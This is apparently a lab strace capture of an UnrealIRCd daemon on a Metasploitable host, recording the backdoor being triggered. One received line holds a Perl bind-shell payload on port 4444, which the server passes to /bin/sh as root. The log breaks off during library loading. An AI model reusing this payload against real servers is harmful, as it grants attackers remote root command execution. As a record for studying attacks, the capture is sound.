4519  07:19:33.159019 select(1024, [2 3 4 7 9], [], NULL, {0, 510000}) = 1 (in [7], left {0, 430000})

4519  07:19:33.234405 clock_gettime(CLOCK_MONOTONIC, {1583, 51413745}) = 0

4519  07:19:33.234405 recv(7, "PRIVMSG  #testit2 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59

4519  07:19:33.234405 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234405 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234406 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234406 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234406 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234406 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234406 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234407 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234419 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234434 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234447 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234461 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234475 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234488 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234564 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234580 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234595 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234609 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234623 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234651 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234665 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234679 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.234697 time(NULL)        = 1495624773

4519  07:19:33.234710 time(NULL)        = 1495624773

4519  07:19:33.234727 gettimeofday({1495624773, 234731}, NULL) = 0

4519  07:19:33.234739 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:19:33.234769 clock_gettime(CLOCK_MONOTONIC, {1583, 51782430}) = 0

4519  07:19:33.234780 gettimeofday({1495624773, 234784}, NULL) = 0

4519  07:19:33.234791 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 910000})

4519  07:19:33.326419 clock_gettime(CLOCK_MONOTONIC, {1583, 143452999}) = 0

4519  07:19:33.326486 accept(2, 0, NULL) = 5

4519  07:19:33.326525 getpeername(5, {sa_family=AF_INET, sin_port=htons(38283), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:19:33.326569 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:19:33.326582 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:19:33.326595 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:19:33.326608 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:19:33.326619 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:19:33.326630 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:19:33.326642 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:19:33.326658 clock_gettime(CLOCK_MONOTONIC, {1583, 143671703}) = 0

4519  07:19:33.326670 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:19:33.326682 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:19:33.326692 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:19:33.326701 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:19:33.326711 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:19:33.326735 send(6, "\242\334\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:19:33.326853 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:19:33.326912 gettimeofday({1495624773, 326916}, NULL) = 0

4519  07:19:33.326973 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:19:33.332466 clock_gettime(CLOCK_MONOTONIC, {1583, 149498236}) = 0

4519  07:19:33.332498 recvfrom(6, "\242\334\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\302\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:19:33.332593 close(6)          = 0

4519  07:19:33.332626 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:19:33.332642 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:19:33.332701 time(NULL)        = 1495624773

4519  07:19:33.332748 time(NULL)        = 1495624773

4519  07:19:33.332774 gettimeofday({1495624773, 332778}, NULL) = 0

4519  07:19:33.332786 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:19:33.332815 clock_gettime(CLOCK_MONOTONIC, {1583, 149827893}) = 0

4519  07:19:33.332825 gettimeofday({1495624773, 332829}, NULL) = 0

4519  07:19:33.332850 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 620000})

4519  07:19:33.704384 clock_gettime(CLOCK_MONOTONIC, {1583, 521393086}) = 0

4519  07:19:33.704384 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:19:33.704384 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704385 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704385 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704397 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704411 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704425 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704438 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704452 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704465 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704479 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704492 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704505 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704519 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704532 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704546 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704559 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704572 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704585 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704649 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704696 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704710 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704725 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 220000}, ...}) = 0

4519  07:19:33.704742 gettimeofday({1495624773, 704759}, NULL) = 0

4519  07:19:33.704774 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:19:33.704849 clock_gettime(CLOCK_MONOTONIC, {1583, 521861824}) = 0

4519  07:19:33.704861 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:19:33.704923 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:19:33.704944 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:19:33.704956 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:19:33.704972 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7608

7608  07:19:33.705048 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7608  07:19:33.705071 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7608  07:19:33.705083 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7608  07:19:33.705097 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7608  07:19:33.705203 brk(0)            = 0x80f9000

7608  07:19:33.705225 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.705242 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f61000

7608  07:19:33.705259 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.705277 open("/etc/ld.so.cache", O_RDONLY) = 1

7608  07:19:33.705290 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7608  07:19:33.705309 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f59000

7608  07:19:33.705320 close(1)          = 0

7608  07:19:33.705331 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.705346 open("/lib/libncurses.so.5", O_RDONLY) = 1

7608  07:19:33.705360 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7608  07:19:33.705455 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7608  07:19:33.705473 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f29000

7608  07:19:33.705485 mmap2(0xb7f56000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f56000

7608  07:19:33.705502 close(1)          = 0

7608  07:19:33.705514 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.705528 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7608  07:19:33.705543 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7608  07:19:33.705646 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7608  07:19:33.705665 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f25000

7608  07:19:33.705676 mmap2(0xb7f27000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f27000

7608  07:19:33.705694 close(1)          = 0

7608  07:19:33.705706 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.714968 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7608  07:19:33.714998 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7608  07:19:33.715096 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7608  07:19:33.715114 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f24000

7608  07:19:33.715129 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd5000

7608  07:19:33.715140 mmap2(0xb7f1e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f1e000

7608  07:19:33.715156 mmap2(0xb7f21000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f21000

7608  07:19:33.715170 close(1)          = 0

7608  07:19:33.715193 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd4000

7608  07:19:33.715206 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd46b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7608  07:19:33.715264 mprotect(0xb7f1e000, 4096, PROT_READ) = 0

7608  07:19:33.715313 munmap(0xb7f59000, 29913) = 0

7608  07:19:33.715338 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7608  07:19:33.715352 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7608  07:19:33.715371 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff018c0) = -1 ENOTTY (Inappropriate ioctl for device)

7608  07:19:33.715401 brk(0)            = 0x80f9000

7608  07:19:33.715460 brk(0x80fa000)    = 0x80fa000

7608  07:19:33.715489 brk(0x80fb000)    = 0x80fb000

7608  07:19:33.715526 getuid32()        = 0

7608  07:19:33.715569 getgid32()        = 0

7608  07:19:33.715579 geteuid32()       = 0

7608  07:19:33.715588 getegid32()       = 0

7608  07:19:33.715601 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7608  07:19:33.715615 time(NULL)        = 1495624773

7608  07:19:33.715627 brk(0x80fc000)    = 0x80fc000

7608  07:19:33.715642 brk(0x80fd000)    = 0x80fd000

7608  07:19:33.715661 open("/proc/meminfo", O_RDONLY) = 1

7608  07:19:33.715682 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7608  07:19:33.715700 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f60000

7608  07:19:33.715712 read(1, "MemTotal:      1035240 kB\nMemFree:        549064 kB\nBuffers:         64888 kB\nCached:         264348 kB\nSwapCached:          0 kB\nActive:         254156 kB\nInactive:       204004 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        548824 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4888 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            16684 kB\nSReclaimable:     8484 kB\nSUnreclaim:       8200 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7608  07:19:33.715793 close(1)          = 0

7608  07:19:33.715804 munmap(0xb7f60000, 4096) = 0

7608  07:19:33.715816 brk(0x80fe000)    = 0x80fe000

7608  07:19:33.715842 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7608  07:19:33.715855 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7608  07:19:33.715867 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7608  07:19:33.715879 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7608  07:19:33.715890 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7608  07:19:33.715902 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7608  07:19:33.715948 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7608  07:19:33.715977 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7608  07:19:33.715990 uname({sys="Linux", node="metasploitable", ...}) = 0

7608  07:19:33.716037 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7608  07:19:33.716055 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7608  07:19:33.716073 brk(0x8100000)    = 0x8100000

7608  07:19:33.716085 getcwd("/etc/unreal", 4096) = 12

7608  07:19:33.716099 getpid()          = 7608

7608  07:19:33.716115 getppid()         = 4519

7608  07:19:33.716130 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7608  07:19:33.716151 stat64("/sbin/sh", 0xbff01898) = -1 ENOENT (No such file or directory)

7608  07:19:33.716164 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7608  07:19:33.716181 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7608  07:19:33.716205 socket(PF_FILE, SOCK_STREAM, 0) = 1

7608  07:19:33.716218 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7608  07:19:33.716230 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7608  07:19:33.716252 close(1)          = 0

7608  07:19:33.716263 socket(PF_FILE, SOCK_STREAM, 0) = 1

7608  07:19:33.716273 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7608  07:19:33.716283 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7608  07:19:33.716301 close(1)          = 0

7608  07:19:33.716314 open("/etc/nsswitch.conf", O_RDONLY) = 1

7608  07:19:33.716328 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7608  07:19:33.716344 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f60000

7608  07:19:33.716355 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7608  07:19:33.716436 read(1, "", 4096) = 0

7608  07:19:33.716447 close(1)          = 0

7608  07:19:33.716457 munmap(0xb7f60000, 4096) = 0

7608  07:19:33.716488 open("/etc/ld.so.cache", O_RDONLY) = 1

7608  07:19:33.716500 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7608  07:19:33.716516 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f59000

7608  07:19:33.716526 close(1)          = 0

7608  07:19:33.716537 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.716551 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7608  07:19:33.716566 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 